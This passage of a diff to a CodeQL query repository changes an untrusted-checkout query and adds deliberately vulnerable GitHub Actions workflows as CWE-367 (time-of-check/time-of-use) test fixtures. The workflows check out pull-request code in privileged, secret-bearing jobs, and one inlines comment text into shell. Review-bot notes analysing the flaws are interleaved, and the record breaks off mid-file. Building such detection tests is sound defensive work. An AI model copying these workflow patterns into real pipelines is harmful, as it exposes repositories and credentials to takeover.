@@ -26,22 +26,6 @@ where checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(step, event) and - ( - // issue_comment: check for date comparison checks and actor/access control checks - event.getName() = "issue_comment" and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(step) and - date_check.dominates(step) - ) - or - // not issue_comment triggered workflows - not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) - ) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml rename to ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml new file mode 100644 index 000000000000..5c6e28eafc8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml 
@@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml 
@@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: 
bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml 
@@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml 
@@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo 
"env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all 
--force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml 
@@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ 
secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + 
kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit 
pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
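Review bot: The `author_association` conditions in the `security-checks` `if:` compare `github.event.pull_request.author_association`, but an `issue_comment` payload carries `issue` and `comment` objects and no top-level `pull_request`, so each comparison runs against an absent value and rejects nobody; test5 and test6 repeat the same expression, and `github.event.comment.author_association` is the field that describes who wrote the comment. In the same job, `full_allowlist` is extended with `$(ls models)` after the PR branch has been checked out, so the PR under review contributes to the allow-list that is supposed to vet its own comment command. The conflicting-push guard reads `jq -r .pushed_at` from the pull object, which as far as I recall exposes `pushed_at` only under `head.repo`, so the `date -d` comparison would likely see `null` and pass silently — worth confirming, because every later checkout in this file resolves `steps.comment-branch.outputs.head_ref`, a branch name, and a push landing after the guard is the TOCTOU this CWE-367 fixture exercises. `Create image`, `Push image` and `Get pipeline info from comment` inline `${{ github.event.comment.body }}` into the `run:` script, whereas the `security-checks` steps pass it through the `COMMENT_BODY` environment variable; the inlined form is the expression-injection pattern rather than the TOCTOU one, so the env-variable form keeps the fixture focused on what it models. Since the .expected file identifies steps by line ranges only, a comment above each `head_ref` checkout such as `# CWE-367: branch name resolved at checkout time, after the guard has run` would make the intended finding legible from the fixture itself.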
diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml new file mode 100644 index 000000000000..9444ad0b627c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test4.yml 
@@ -0,0 +1,89 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml new file mode 100644 index 000000000000..e3e557cc5112 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test5.yml 
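Review bot: The job-level `if:` gates on `github.event.issue.author_association`, which is the association of the pull request's author rather than of the person who wrote the `/deploy` comment; a comment from any account on an OWNER's PR satisfies it, and `github.event.comment.author_association` is the field that describes the commenter. The `Check comment keywords` step invokes the helper inside backticks with `"echo $PR_COMMENT_ALLOW_LIST"` and `"echo $COMMENT_BODY"` as its arguments, which passes the literal word `echo` as data and relies on bash reporting the substitution's status for an otherwise empty command; `if list_subset "$PR_COMMENT_ALLOW_LIST" "$COMMENT_BODY"; then` says what is meant, and the same form appears in test5's keyword check and, with `$full_allowlist`, in test3's and test6's. Unlike the other fixtures this one checks out `steps.environment.outputs.head_sha`, a commit read from the API in the same job after the keyword check, rather than a branch name; a short comment on that checkout step noting that the ref is pinned to the SHA fetched post-check would tell a reader which TOCTOU variant the file models.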
@@ -0,0 +1,209 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo 